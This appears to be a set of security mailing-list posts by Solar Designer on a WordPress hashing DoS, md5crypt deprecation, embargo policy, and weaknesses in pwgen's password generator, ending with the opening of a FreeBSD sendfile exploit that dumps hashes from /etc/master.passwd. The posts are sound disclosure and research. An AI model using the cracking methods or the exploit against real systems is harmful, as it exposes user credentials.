Re: WordPress 3.5.1, Denial of Service

2013-06-12 Thread Solar Designer
Hi guys,

I'll over-quote a little, then comment below:

On Tue, Jun 11, 2013 at 08:55:21PM +0200, Peter Bex wrote:
> On Fri, Jun 07, 2013 at 06:29:48PM +0200, Krzysztof Katowicz-Kowalewski wrote:
> > Version 3.5.1 (latest) of popular blogging engine WordPress suffers from 
> > remote denial of service vulnerability. The bug exists in encryption module 
> > (class-phpass.php). The exploitation of this vulnerability is possible only 
> > when at least one post is protected by a password.
[...]
> > More information (including proof of concept):
> > https://vndh.net/note:wordpress-351-denial-service
[...]
> This phpass.php isn't hand-rolled like you stated in your blog post; it's
> a copy of a public domain crypt()-workalike: http://www.openwall.com/phpass/
> There are several other systems which implement their password hashing
> using this library.
> 
> Having said that, being able to control the setting looks like a mistake on
> the part of Wordpress, so I'm not sure the bug is in phpass, strictly
> speaking.  However, have you considered contacting upstream
> (Solar Designer/OpenWall) about this?

Web apps (like WordPress) were indeed not supposed to expose the ability
for untrusted users to specify arbitrary "setting" strings (which
include the configurable cost).  I am unfamiliar with WordPress, so I
don't know why they do it here - is this instance of their use of phpass
perhaps meant to achieve similar goals that tripcodes do?  If so, yes,
they should be sanitizing the cost setting (perhaps with a site admin
configurable upper bound).  However, for password hashes coming from
WordPress user/password database (primary intended use of phpass), this
should not be necessary.  (Indeed, a similar DoS attack could be
performed by someone having gained write access to the database, but
that would likely be the least of a site admin's worries.)
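For illustration, such sanitization could look roughly like this - a hedged sketch in C rather than phpass's PHP.  The "$P$"/"$H$" prefix and itoa64-encoded count character follow the portable phpass format as I understand it; `max_log2` stands for the hypothetical admin-configurable upper bound:

```c
#include <string.h>

/* itoa64 alphabet used by phpass portable hashes */
static const char itoa64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Extract log2 of the iteration count from a "$P$"/"$H$" setting;
 * the 4th character encodes it via the itoa64 alphabet. */
static int phpass_log2_rounds(const char *setting)
{
    const char *p;

    if (strncmp(setting, "$P$", 3) && strncmp(setting, "$H$", 3))
        return -1;
    if (!setting[3])
        return -1;
    p = strchr(itoa64, setting[3]);
    if (!p)
        return -1;
    return (int)(p - itoa64);
}

/* Reject settings outside [7, max_log2]; the portable phpass code
 * itself insists on at least 7, and max_log2 would be the
 * admin-configurable cap proposed above. */
static int setting_acceptable(const char *setting, int max_log2)
{
    int n = phpass_log2_rounds(setting);

    return n >= 7 && n <= max_log2;
}
```

WordPress-generated hashes start with "$P$B" (encoded count 13), so a cap of, say, 13 or 14 would pass them while rejecting attacker-supplied settings with absurd costs.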

The problem of DoS attacks via attacker-chosen cost settings with
tunable password hashing schemes like this is actually a general one
(and it's even more of a problem when the memory cost is also tunable).
An example is the Apache web server, where local DoS is possible via
malicious bcrypt or (more recently) also SHA-crypt hashes in .htpasswd
files.  (And to a lesser extent also via extended DES-based hashes,
which are supported on *BSDs and more.)  Although the DoS is local, it
affects other users of the Apache instance (not just the attacking local
user) and potentially of the entire system.  Arguably, the fact that
Apache is in general very susceptible to various DoS attacks qualifies
as an excuse (there's no expectation of any DoS resistance with Apache,
is there?) ;-)  (e.g., wouldn't having it read a "huge" sparse file
result in similar behavior?)

Arguably, library code should reject the most insane parameter values.
For example, musl libc - http://www.musl-libc.org - version 0.9.10
rejects bcrypt's log2(cost) > 19 and limits SHA-crypt's rounds count
to < 10M for this reason (original SHA-crypt limits to < 1 billion).
However, on one hand this is insufficient (if an application exposes the
setting as untrusted input, it should have its own sanitization and/or
other safety measures anyway) and on the other hand the arbitrary limits
may be problematic in some obscure cases (e.g., when reusing the same
underlying password hashing scheme as a KDF for encrypting a rarely-used
piece of data locally).  So it's more of a partial workaround for the
present state of things e.g. with Apache, than it is a real solution.

Maybe future password hashing APIs should include a function to sanitize
a provided setting string given certain high-level limits (not abstract
log2(cost) numbers, but e.g. microseconds and kilobytes - even though
the function may have to use estimates of the expected actual usage).
Applications would then be advised to use this function if and where
appropriate.  Alternatively, maybe the password hashing function itself
should accept these upper limits as optional inputs (and refuse to work,
in some fail-close manner, if the limits would likely be exceeded).
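As a toy illustration of the second idea (all numbers assumed, not measured): map bcrypt's log2(cost) to a rough time estimate and fail closed when a caller-supplied budget would be exceeded.

```c
/* Assumed ballpark: ~125 microseconds per bcrypt hash at cost 4 on
 * some reference CPU; each cost step doubles the time. */
static long long bcrypt_est_usec(int log2_cost)
{
    const long long base_usec = 125;

    return base_usec << (log2_cost - 4);
}

/* Fail-closed check: accept the setting only if the estimated
 * running time fits within the caller's budget. */
static int within_time_budget(int log2_cost, long long max_usec)
{
    if (log2_cost < 4 || log2_cost > 31)
        return 0;
    return bcrypt_est_usec(log2_cost) <= max_usec;
}
```

A real implementation would have to calibrate the baseline against actual hardware, which is exactly why the API would work with estimates, as noted above.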

Except for the specific upper limits imposed by musl, which were chosen
last year, none of the above is new - it's just that we all have been
sitting on this general issue for many years.  It's about 20 years since
extended DES-based hashes with variable iteration counts were introduced
in BSD/OS in early 1990s and reimplemented in FreeSec in 1993, and
Apache's .htpasswd (predecessor) is maybe only slightly younger.

Nice find regarding the specific WordPress issue, though!  And a nice
reminder, too.

Alexander


Re: CVE-2012-3287: md5crypt is no longer considered safe

2012-06-12 Thread Solar Designer
On Fri, Jun 08, 2012 at 12:04:49AM +, p...@freebsd.org wrote:
> The LinkedIn password incompetence has resulted in a number of "just use 
> md5crypt and you'll be fine" pieces of advice on the net.
> 
> Since I no longer consider this to be the case, I have issued an official 
> statement, as the author of md5crypt, to the opposite effect:
> 
> http://phk.freebsd.dk/sagas/md5crypt_eol.html
> 
> Please find something better now.

Thank you for posting this - it was interesting to learn of your opinion
on the matter after all those years!  Ditto re: "The history of md5crypt":

http://phk.freebsd.dk/sagas/md5crypt.html

Now, since some people are in fact still using md5crypt, they'll need
to think about what to move to.  You almost recommend that they roll
their own - a recommendation I disagree with (as we've already
discussed off-list).

The main options are bcrypt and SHA-crypt.  Many would recommend scrypt
instead - for good reasons - but there's no crypt(3) interface for it
yet, also for good reasons, e.g.:
http://www.openwall.com/lists/crypt-dev/2011/05/12/4

Personally, I think that bcrypt and SHA-crypt are quite close to
becoming obsolete in favor of something new, yet right now I would still
recommend moving to bcrypt as the most suitable pre-existing password
hashing method.  So if you're to move to something "temporary" at all,
better move to a password hashing method already in use - and for now
this should be bcrypt - than roll your own.  (My opinion only, indeed.
Someone else may disagree.)

What's wrong with bcrypt, though?  Mainly two things, I think:

1. Not enough natural parallelism in one instance (so that it could be
made use of by an authentication server and not only by an attacker,
who always has plenty of parallelism due to having lots of candidate
passwords to try).  I started complaining about this around 1998, but
this problem was not pressing enough to introduce yet another password
hashing method so far.  The speedup from extra parallelism available to
attacker only is up to a factor of 2 on typical CPUs so far (due to
instruction level parallelism only, but not SIMD).  However, I expect
this to change with AVX2 VSIB addressing (gather) next year, which
appears to allow for parallel computation of 8 bcrypt hashes in 256-bit
vectors - by attacker only.  There may be fewer vector units than ALUs,
though, so the speedup over what the attacker currently has (already up
to 2x faster than defender) will likely be significantly less than 8x.

2. The memory requirement of 4 KB is not configurable and is rather
low - barely enough to defeat GPUs so far, but this may change, and
there may be other hardware-based attacks.  So far, experimental John
the Ripper patches by Sayantan Datta achieve CPU-like performance at
bcrypt on AMD Radeon HD 7970 (we have to either use the slow global
memory or explicitly heavily under-utilize the GPU's computing resources
so that the smaller number of concurrent bcrypt computations fits in
local memory), but there's room for improvement:
http://www.openwall.com/lists/john-dev/2012/06/06/1
(The c/s rates are for $2a$05, used as baseline for historical reasons;
for comparison, AMD FX-8120 CPU provides approx. 5400 c/s at that setting,
which is slightly faster than the GPU so far.)  I expect that
significant speedup over CPU may be demonstrated soon (just not as
significant as it is for MD5, etc.)  Here are some very rough estimates
for the potential speedup:
http://www.openwall.com/lists/john-dev/2012/05/14/1

What's wrong with SHA-crypt?  It's similar, but worse:

1. Not enough natural parallelism in one instance.  Well, at least it
uses 64-bit integers (the flavor based on SHA-512), whereas bcrypt is
32-bit only, but on the other hand in addition to extra instruction
level parallelism while cracking we can also use SIMD (on current CPUs
already, even though this is not implemented yet).

2. Almost no memory requirements.  The register pressure is a bit high
for GPUs, but not to the point where GPUs would not provide an advantage.

So far, SHA-crypt at its default rounds=5000 is crackable on a GPU at
more than 10x the speed of bcrypt at comparable settings ($2a$08, which
is default on some systems), due to John the Ripper patch by Claudio Andre:
http://www.openwall.com/presentations/PHDays2012-Password-Security/mgp00037.html

Thus, out of these two, bcrypt wins; the rest are either worse or not
yet ready for end-user consumption (sysadmins, web app authors, etc.)


(OK, I already plugged some links to openwall.com pages above, but this
is getting too much, hence the tags.)

I made a talk on this topic at PHDays last week.  Here are the slides:

http://www.openwall.com/presentations/PHDays2012-Password-Security/

I give some historical background on password security with focus on
password hashing (1960s to 2012), and then in the last 9 slides I share
some thoughts on the future:

Desirable properties of a future KDF
KDFs unfriendly to hardware we do not have
CPU + RA

Re: CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

2012-03-27 Thread Solar Designer
Hi,

As stated in the timeline below (thanks!), this issue was handled in
part using the Openwall-hosted distros list (which currently notifies
many Linux distro vendors, FreeBSD, and NetBSD/pkgsrc with PGP
re-encryption to individual recipients):

http://oss-security.openwall.org/wiki/mailing-lists/distros

The primary reason why I feel I have to post this follow-up message is
that the long embargo period here was a major violation of the list's
policy.  It is the second major violation so far; the first one was for
HashDoS, and it was similarly discussed on oss-security after the fact:

http://www.openwall.com/lists/oss-security/2011/12/29/4
http://www.openwall.com/lists/oss-security/2011/12/29/7

It's cases like this that may eventually make us reconsider and stop
hosting the non-public lists.  (Some propose automatic publishing of
messages after N days as an alternative.)  Luckily, so far violations
like this have been relatively rare, and one of the reasons why I feel
every one of them needs attention is to keep it so.

I've included more detail below:

On Sat, Mar 24, 2012 at 09:40:42AM -0700, VSR Advisories wrote:
> 2012-01-09OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor
>   maintainers were provided a draft advisory and test sample.
>   The OpenWall "distros" mailing list was also notified.
>   Apache OpenOffice Security team acknowledged notification.
>   libraptor developer confirmed flaw.
> 
> 2012-01-10CVE-2012-0037 assigned by Apache.
> 
> 2012-02-02Notified OpenWall "distros" mailing list again, due to previous
>   technical problems.

IIRC, the "technical problems" being referred to here were an attachment
not being re-encrypted to list members, so they only had partial info
until this point - essentially just the fact that there's a
vulnerability in those products, but with no detail; given the extra
embargo time (not needed by distro vendors) this may actually be good.
The list setup is a bit picky about what encrypted message formats it
supports (besides plaintext, they may be PGP/MIME or PGP inline, but
they can't have individual pre-encrypted attachments - this has since
been clarified on the wiki).

> 2012-02-04libraptor developer provided patches to all notified parties.
> 
> 2012-02-22Extensive arguing between vendors about embargo/release date.
> 
> 2012-03-06More arguing about release date.
> 
> 2012-03-14Agreed upon release date established.
> 
> 2012-03-22Security updates and vendor advisories released.
> 
> 2012-03-24VSR advisory released.

At the time of the initial notification in January, the distros list
policy was to allow a maximum embargo period of 14 days (and this was
stated on the wiki page with the list posting address).  At the time of
the second notification in February, the policy was stated as:

"Please note that the maximum acceptable embargo period for issues
disclosed to these lists is 14 to 19 days, with embargoes longer than 14
days (up to 19) allowed in case the issue is reported on a Thursday or a
Friday and the proposed coordinated disclosure date is thus adjusted to
fall on a Monday or a Tuesday.  Please do not ask for a longer embargo.
In fact, embargo periods shorter than 7 days are preferable."

When it became apparent that this was to be violated since one or two of
the affected upstreams wanted much more time, the reporter (Timothy D.
Morgan of VSR Security) explained that at the time of his initial
notification he had thought that 14 days would in fact be enough.  While
this sounds like a rather fundamental problem with a maximum embargo
time policy (it is always possible that something new is discovered
during discussion, which may invalidate the initial time estimate of the
reporter), I've just added the following verbiage to hopefully reduce
the number of such occurrences going forward:

"If you have not yet notified upstream projects/developers of the
affected software, other affected distro vendors, and/or affected Open
Source projects, you may want to do so before notifying one of these
mailing lists in order to ensure that these other parties are OK with
the maximum embargo period that would apply (and if not, then you may
have to delay your notification to the mailing list), unless you're
confident you'd choose to ignore their preference anyway and disclose
the issue publicly soon as per the policy stated here."

Of course, I fully expect this attempt to sometimes fail, but maybe -
just maybe - it will help in some cases.  There's no perfect solution
here (although some would reasonably argue that simply not doing any
pre-disclosure coordination is perfect - in a way it is).

The time required by the free office product vendors to issue a security
fix here reminded me of web browsers in 1990s.  Several web browser
vendors have since learned to issue security fixes much quicker, but
apparently office vendors still lack the processes to do so.

Re: pwgen: non-uniform distribution of passwords

2012-01-23 Thread Solar Designer
On Thu, Jan 19, 2012 at 11:34:12PM +0400, Solar Designer wrote:
> $ ./pwgen -1cn 8 1000000000 | dd obs=10M > 1g
...
> $ time ~/john/john-1.7.9-jumbo-5/run/unique -v -mem=25 1gu < 1g
> Total lines read 1000000000 Unique lines written 697066573

Here's some further analysis of the 1 billion sample used as a training
set along with a separate 1 million sample used as a test set:

Applying the 697 million unique passwords (from the 1 billion sample
above) as a wordlist (6 GB file size) to crack another 1 million of
pwgen'ed passwords cracks 418168 of them (41.8%).  For a uniform
distribution (which is not the case), this would correspond to total
keyspace size of about 1.67 billion passwords (between 30 and 31 bits).

Focusing on more frequent pwgen'ed passwords only:

The most common passwords in my 1 billion sample happen to be, prefixed
by number of occurrences:

127 Ooquoo0e
125 ooghai0E
123 eiThie7e
123 aiShie8o
122 eiQuei9u
122 Aighah4u
121 eichae1I
121 Oophai4o
121 Oochoh5u
121 Iephee6e

the next one is seen 120 times.  Overall, there are 3452 unique
passwords with 100 occurrences or more (in 1 billion generated).

Taking these 3452 as a wordlist cracks 284 passwords in the separate
1 million sample.  This is 0.0284%.  However, 3452 is only 0.0002% of
the 1.67 billion estimate for the keyspace size that we arrived at
above.  Hence, the distribution is non-uniform, and our speedup from
exploiting this property is at least 137x on this test.  (284 / 2 is
obviously 142, but I used more precise numbers here.)
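The arithmetic behind that figure can be expressed as a tiny helper (using the rounded 1.67 billion keyspace estimate from above):

```c
/* Speedup of a frequency-ordered wordlist over a uniform guesser:
 * fraction of the test set cracked, divided by the fraction of the
 * keyspace the wordlist covers. */
static double wordlist_speedup(double cracked, double tested,
                               double list_size, double keyspace)
{
    return (cracked / tested) / (list_size / keyspace);
}
```

With cracked = 284, tested = 1 million, list_size = 3452, and keyspace = 1.67 billion, this comes out at roughly 137, matching the "at least 137x" above.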

Checking this another way, the keyspace size estimate assuming uniform
distribution would be only 12 million based on the test above - a lot
lower than the previous estimate.  This similarly confirms that the
distribution is non-uniform.

Top 1 million unique passwords from my 1 billion training set cracks
37149 in the test set (3.7%).  The corresponding uniform keyspace size
estimate is 27 million.

Top 10 million unique passwords cracks 145179 (14.5%).  The keyspace
size estimate is 69 million.

Top 100 million unique passwords cracks 262693 (26.3%).  The keyspace
size estimate is 381 million.

Finally, only 115339574 unique passwords are seen in the 1 billion
sample more than once.  (This is less than 1000-697 = 303 million
because many passwords are seen more than 2 times each.)  Using them as
a wordlist cracks 276382 (27.6%).  The keyspace size estimate is 417
million.
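Each of the uniform keyspace size figures in this message is just wordlist size divided by fraction cracked; a quick way to check them:

```c
/* Under a uniform distribution, if a wordlist of W distinct values
 * cracks a fraction p = cracked/tested of fresh samples, the
 * keyspace size is about W / p. */
static double uniform_keyspace(double wordlist, double cracked,
                               double tested)
{
    return wordlist / (cracked / tested);
}
```

For example, uniform_keyspace(10000000, 145179, 1000000) gives about 69 million, and the 697 million wordlist with 41.8% cracked gives about 1.67 billion, matching the figures above.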

Chances are that I won't spend further time on this, although a possible
project would be to create a program that would output all or top N of
pwgen'ed passwords using exact probabilities (based on analysis of
pwgen's source code and/or behavior of pwgen with non-random inputs
rather than based on normal pwgen invocations like I did so far, which
only provides estimates).  This would result in more efficient attacks
(more passwords in the test set cracked per candidate passwords tested).

Alexander


Re: pwgen: non-uniform distribution of passwords

2012-01-20 Thread Solar Designer
On Thu, Jan 19, 2012 at 09:21:17AM +0100, valentino.angele...@enel.com wrote:
> may I ask you what software you used (and how it works, brute force, etc.)?

John the Ripper, indeed - generating a custom .chr file (which is based
on trigraph frequencies) from a sample of 1 million of pwgen'ed
passwords and then using this file to crack another (non-overlapping)
sample of pwgen'ed passwords.  My initial notification to oss-security
and Bugtraq included these links, which describe this in more detail:

http://www.openwall.com/lists/john-users/2010/11/17/7
http://www.openwall.com/lists/john-users/2010/11/22/5
http://www.openwall.com/lists/john-users/2010/11/28/1
http://www.openwall.com/lists/john-users/2010/12/06/1
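The .chr approach boils down to training on character frequencies conditioned on position and the two preceding characters ("trigraph frequencies").  A toy sketch of just the counting step - nothing like JtR's actual .chr code or file format:

```c
/* counts[prev2][prev1][current]; index 0 stands for "start of word".
 * 128^3 unsigned counters is about 8 MiB of static storage. */
static unsigned counts[128][128][128];

/* Accumulate trigraph frequencies from one training password. */
static void train_trigraphs(const char *password)
{
    int prev2 = 0, prev1 = 0;
    const char *p;

    for (p = password; *p; p++) {
        int c = (unsigned char)*p & 127;

        counts[prev2][prev1][c]++;
        prev2 = prev1;
        prev1 = c;
    }
}
```

Candidate generation then tries characters in decreasing order of these counts, so the characters pwgen emits more often get tested earlier - which is where the speedup comes from.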

However, as I wrote in a followup posting to oss-security 2 days ago:

"I might update/revise my analysis on this issue in a few days.

Specifically, I now suspect that a (large) part of the apparent
non-uniformity of the distribution was in fact an artifact of my
analysis approach.  I only analyzed sets of 1 million of pwgen'ed
passwords, so I could not directly check the distribution of full
passwords (1 million is too little, even compared to the small keyspace
of these passwords), whereas JtR only uses trigraph frequencies.

I am now generating 1 billion of pwgen'ed passwords, which should take a
couple of days to complete. [...]"

http://www.openwall.com/lists/oss-security/2012/01/17/14

This has in fact completed by now:

$ ./pwgen -1cn 8 1000000000 | dd obs=10M > 1g
17578125+0 records in
858+1 records out
9000000000 bytes (9.0 GB) copied, 147496 seconds, 61.0 kB/s

And I analyzed this larger sample briefly:

$ time ~/john/john-1.7.9-jumbo-5/run/unique -v -mem=25 1gu < 1g
Total lines read 1000000000 Unique lines written 697066573

real144m40.619s
user142m8.727s
sys 0m39.645s

So that's 697 million unique passwords in 1 billion, which for a uniform
distribution would correspond to a total keyspace size of 1.3 billion:

$ ./solve 697066573 1000000000
1296935185

I've attached the solve.c program to this message.  [ BTW, I verified
that there's no fatal precision loss in its expected_different()
function (despite the risky expression) for the value ranges on which
it is called here.  I did so by also computing the expected different
value with a different (much slower) algorithm - just not as part of
equation solving (which would be slower yet). ]

However, let's see what numbers we get for smaller samples (actually,
subsets of the 1 billion sample above, but that's OK in this case):

Total lines read 100000000 Unique lines written 89163247
Total lines read 10000000 Unique lines written 9811335
Total lines read 1000000 Unique lines written 997978

$ ./solve 89163247 100000000
427419891
$ ./solve 9811335 10000000
261676022
$ ./solve 997978 1000000
246946702

As we can see, the guess for the total keyspace size keeps increasing as
we increase the sample size.  That's under assumption that we have a
uniform distribution.  Hence, our distribution is non-uniform.

That said, the keyspace may in fact be smaller than I had expected,
although I haven't hit it with my 1 billion sample yet.  So we have a
mix of two problems here: likely small keyspace and non-uniform
distribution.

My John the Ripper pwgen.chr attack was probably testing a lot of
passwords that are actually impossible, so a much faster attack (even
more specifically focused on pwgen'ed passwords) should be possible.

I think I underestimated just how much smaller pwgen's pronounceable
passwords keyspace is compared to the full {62 different, length 8}
keyspace, although we still do not have the exact number.

I continue to think that the primary problem in terms of pwgen use is
that these passwords look much stronger than they actually are.  For
example:

$ pwgen
athu9Bee Vae0jexa rae2Oa1c Aim8Ku3c No5aep0F OhY5quee ieVae2ti wah1aiM2
oaNg1oth baePule5 sod8oH6i ohfoh5Du Pai9Uch7 AeG3bies Maev6tae iKievae9
zo9eiSai Xito9aid iGh3ay8s owib0Ub8 Yahm0oaC Wu3VaiK7 IeK3sah2 xai7Eico
...

Looking at these, how many people would realize that the keyspace for
them may be thousands of times smaller than the full {62 different,
length 8} keyspace and that the distribution may be non-uniform?

Based on the 1 billion sample, the keyspace is 168,350 times smaller,
although this estimate has the non-uniformity "factored in" (a larger
sample would show a somewhat larger keyspace estimate).

A partial fix may be for pwgen to print a warning each time it is used
in this mode and with output to a tty (it already behaves differently
based on whether its output is a tty or not, so that won't be a new
drawback).  Also, the default mode may be changed to the "secure" one,
with the weak alternative available via a non-default option.
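The tty-detection part is a one-liner; a sketch of what such a warning might look like (hypothetical wording, not actual pwgen code):

```c
#include <stdio.h>
#include <unistd.h>

/* Warn only when output goes to a terminal, mirroring how pwgen
 * already varies its behavior based on whether stdout is a tty.
 * Returns 1 if a warning was printed. */
static int maybe_warn(FILE *out)
{
    if (!isatty(fileno(out)))
        return 0;
    fprintf(stderr,
        "warning: pronounceable passwords are much weaker than they "
        "look; use -s where offline attacks are a concern\n");
    return 1;
}
```

Since scripted invocations pipe the output, they would never see the warning, so this wouldn't break existing automation.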


Or indeed people can just use pwqgen instead:

http://www.openwall.com/passwdqc/

$ for n in {1..10}; do pwqgen; done
Warm5Claw4Blame
hungry5tomato3Yeah
Midst_Vowel9Spate
Ohio7steak$Mild
Taxi&desert+gorge
fond-Pint=easy
mo

Re: pwgen: non-uniform distribution of passwords

2012-01-18 Thread Solar Designer
On Tue, Jan 17, 2012 at 02:01:38PM +0400, Solar Designer wrote:
> Time running (D:HH:MM) - Keyspace searched - Passwords cracked
> 0:00:02 - 0.0008% - 6.0%
> 0:01:00 - 0.025% - 19.5%
> 0:20:28 - 0.5% - 39.1%
> 1:16:24 - 1.0% - 47.1%
> 3:00:48 - 1.8% - 55.2%
> 3:21:44 - 2.3% - 59.4%
> 5:05:17 - 3.1% - 64.2%
...
> I did some testing of pwgen-2.06's "pronounceable" passwords, and I
> think they might be weaker than you had expected (depends on what you
> had expected, which I obviously don't know).

It was just pointed out to me off-list that the man page for pwgen
specifically mentions that this kind of passwords "should not be used in
places where the password could be attacked via an off-line brute-force
attack."  I had missed that detail or at least I did not recall it.

This kind of documentation certainly mitigates the problem to some extent.

Yet I think this gives users the perception that only the keyspace is
smaller, not that the generated passwords are distributed non-uniformly.
In fact, most users would not even think of the latter risk.

The passwords look much stronger than they actually are, and I think
this is a problem.  They look like almost random sequences of 8
characters, whereas the level of security for 6% to 20% of them is
similar to that of dictionary words with minor mangling.

Sure, there's a trade-off, but non-uniform distribution didn't have to
be part of it.  That's an implementation shortcoming.

> Specifically, not only the keyspace is significantly smaller than that
> for "secure" passwords (which I'm sure you were aware of), but also the
> distribution is highly non-uniform.  My guess is that this results from
> different phonemes containing the same characters.  So certain
> substrings can be produced in more than one way, and then some
> characters turn out to be more probable than some others (especially as
> it relates to their conditional probabilities given certain preceding
> characters).

Alexander


pwgen: non-uniform distribution of passwords

2012-01-17 Thread Solar Designer
Hi,

I never heard back from Ted on the below.  I am not complaining -
I understand that Ted is super busy with great stuff like ext4 - yet I
think it's time to bring this to oss-security (for distros) and to
Bugtraq (for end-users).  (Not really "to make this public" since the
issue was already discussed in public on john-users.)

Some highlights (excerpts from the longer message below):

"Time running (D:HH:MM) - Keyspace searched - Passwords cracked
0:00:02 - 0.0008% - 6.0%
0:01:00 - 0.025% - 19.5%
0:20:28 - 0.5% - 39.1%
1:16:24 - 1.0% - 47.1%
3:00:48 - 1.8% - 55.2%
3:21:44 - 2.3% - 59.4%
5:05:17 - 3.1% - 64.2%

6% of pwgen'ed passwords get cracked in 2 minutes.  This is with NTLM
hashes, which are obviously very fast.  For the MD5-based crypt(3),
NTLM's 2 minutes would translate to 2 days, and this would apply
per-salt, yet having 6% of passwords crackable in 2 days on a single CPU
core is probably unacceptable.

What might be worse is that 0.5% of passwords get cracked in 1 second
(NTLM).  This is approx. 20 minutes for MD5-based crypt(3) hashes, also
on one CPU core.  0.5% is small, but not negligible."

Additional notes for Bugtraq:

Now is a good time because a related issue was just brought up:

"gpw password generator giving short password at low rate"
http://www.openwall.com/lists/oss-security/2012/01/17/2

Oh, and while I am at it: beware of JavaScript password generators -
these are almost universally broken by design.

Not very closely related, but DragonFly BSD's password hashing is
ridiculous (non-portable and weaker than FreeBSD's).  I am gradually
bringing more attention to the problem in an attempt to get it
corrected (this posting is one such step):

http://www.openwall.com/lists/oss-security/2012/01/16/2

Alexander

----- Forwarded message from Solar Designer -----

Date: Tue, 25 Jan 2011 17:51:43 +0300
From: Solar Designer 
To: Theodore Ts'o 
Subject: pwgen: non-uniform distribution of passwords

Hi Ted,

I did some testing of pwgen-2.06's "pronounceable" passwords, and I
think they might be weaker than you had expected (depends on what you
had expected, which I obviously don't know).

Specifically, not only the keyspace is significantly smaller than that
for "secure" passwords (which I'm sure you were aware of), but also the
distribution is highly non-uniform.  My guess is that this results from
different phonemes containing the same characters.  So certain
substrings can be produced in more than one way, and then some
characters turn out to be more probable than some others (especially as
it relates to their conditional probabilities given certain preceding
characters).

By generating a custom .chr file for John the Ripper based on a lot of
pwgen'ed passwords, I am able to crack further pwgen'ed passwords a lot
faster - possibly faster than you would have expected.  This is without
any custom programming yet, which could provide a further speedup (by
fully avoiding candidate passwords that couldn't possibly be generated).

Time running (D:HH:MM) - Keyspace searched - Passwords cracked
0:00:02 - 0.0008% - 6.0%
0:01:00 - 0.025% - 19.5%
0:20:28 - 0.5% - 39.1%
1:16:24 - 1.0% - 47.1%
3:00:48 - 1.8% - 55.2%
3:21:44 - 2.3% - 59.4%
5:05:17 - 3.1% - 64.2%

That is, 6% of pwgen'ed passwords get cracked in 2 minutes.  This is
with NTLM hashes, which are obviously very fast.  For the MD5-based
crypt(3), NTLM's 2 minutes would translate to 2 days, and this would
apply per-salt, yet having 6% of passwords crackable in 2 days on a
single CPU core is probably unacceptable - or at least not what users of
pwgen would reasonably expect (I think), unless they're explicitly told
about this.  On a quad-core, this is 6% in half a day.

What might be worse, but is not seen in the table above, is that 0.5%
of passwords get cracked in 1 second (NTLM).  This is approx. 20 minutes
for MD5-based crypt(3) hashes, also on one CPU core.  0.5% is small, but
not negligible.

The "keyspace searched" column above shows percentage of the full
{62 different, length 8} keyspace.  I'd also include percentages of the
smaller keyspace that corresponds to the pronounceable passwords only,
but its size is non-trivial to calculate, so I did not bother...

Additionally, there are over 2 thousand duplicates in just 1 million of
generated passwords.  Sounds like too many dupes.  Not what a user would
expect, I think.
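For comparison (my arithmetic, not from the original message): under a uniform distribution, the expected number of duplicates among n draws from a keyspace of K values is roughly n^2/(2K).

```c
/* Rough birthday-style estimate: expected duplicates among n
 * uniform draws from a keyspace of K values, valid for n << K. */
static double expected_dupes(double n, double K)
{
    return n * n / (2.0 * K);
}
```

Even taking a keyspace on the order of the ~1.3 billion estimated elsewhere in this thread, expected_dupes(1e6, 1.3e9) is only about 385 - far below the 2000+ observed, which again points at a non-uniform and/or smaller-than-assumed keyspace.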

More info on the attack:

http://www.openwall.com/lists/john-users/2010/11/17/7
http://www.openwall.com/lists/john-users/2010/11/22/5
http://www.openwall.com/lists/john-users/2010/11/28/1
http://www.openwall.com/lists/john-users/2010/12/06/1

The "secure" ("-s") passwords appear to be safe from this:

http://www.openwall.com/lists/john-users/2010/12/07/3

A reimplementation of pwgen in JavaScript shows even worse behavior:

http://www.openwall.com/lists/j

6-year FreeBSD-SA-05:02.sendfile exploit

2011-04-01 Thread Solar Designer
Hi,

This is almost 0-day.  In a sense.

I wrote this for a pentesting company.  I found it ethically OK to do
since the FreeBSD advisory was already out for a couple of weeks.
It turns out I was not alone to write an exploit for this bug, and to
publish the exploit this year.

Timeline:

2005/04/04 - FreeBSD-SA-05:02.sendfile published:
http://security.freebsd.org/advisories/FreeBSD-SA-05:02.sendfile.asc

2005/04/16 - reliable FreeBSD 4.x local exploit written ...

2005/04/21 - ... and updated to work on 5.x as well (up to 5.3)

2011/02/05 - Kingcope publishes "FreeBSD <= 5.4-RELEASE ftpd (Version
6.00LS) sendfile kernel mem-leak Exploit":
http://seclists.org/fulldisclosure/2011/Feb/83
(By the way, the "<=" is wrong.)

2011/04/01 - Hey, that's today.


Openwall is participating in Google Summer of Code 2011.  Applications
from students and mentors are currently accepted.  And this is no joke.
Besides Owl and JtR tasks (for which we're already seeing a competition
among students), we have a number of reasonably crazy ideas that a
student could work on.  Please take a look.  Although our "capacity" for
GSoC 2011 is quite limited, some of these may be worked on outside of
GSoC as well.

http://www.google-melange.com/gsoc/org/google/gsoc2011/openwall
http://openwall.info/wiki/ideas


--- sendump.c ---
/*
 * sendump - FreeBSD-SA-05:02.sendfile exploit - 2005/04/16.
 * Updated for FreeBSD 5.x, added alternate hash types, added optional
 * relaxed pattern matching - 2005/04/21.
 *
 * This program is meant to be used in controlled environments only.
 * If found in the wild, please return to ... wait, this is public now,
 * and this program is hereby placed in the public domain.  Feel free to
 * reuse parts of the source code, etc.
 *
 * Password hashes will be dumped to stdout as they're being obtained.
 * There may be duplicates.
 *
 * Debugging may be enabled with one to three "-d" flags.  Debugging
 * information will be dumped to stderr and, for levels 2 and 3, to
 * the "dump" file.
 *
 * Relaxed pattern matching may be enabled with "-r".  This increases
 * the likelihood of printing garbage while also making it more likely
 * to actually catch the hashes.
 *
 * There's some risk of this program crashing the (vulnerable) system,
 * although this is not intentional.  Normally, the program just prints
 * password hashes from /etc/master.passwd in a format directly usable
 * with John the Ripper.
 *
 * Compile/link with "gcc -Wall -O2 -fomit-frame-pointer -s -lutil".
 *
 * Run this on a filesystem with soft-updates for best results.
 */
/* Note: the original header names were stripped by the list archive;
 * the includes below are a reconstruction based on the functions used. */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>

/* for forkpty(); will also need to link against -lutil
 * (header names reconstructed; on FreeBSD forkpty() is in libutil.h) */
#include <sys/ioctl.h>
#include <termios.h>
#include <libutil.h>

#define Ki  1024
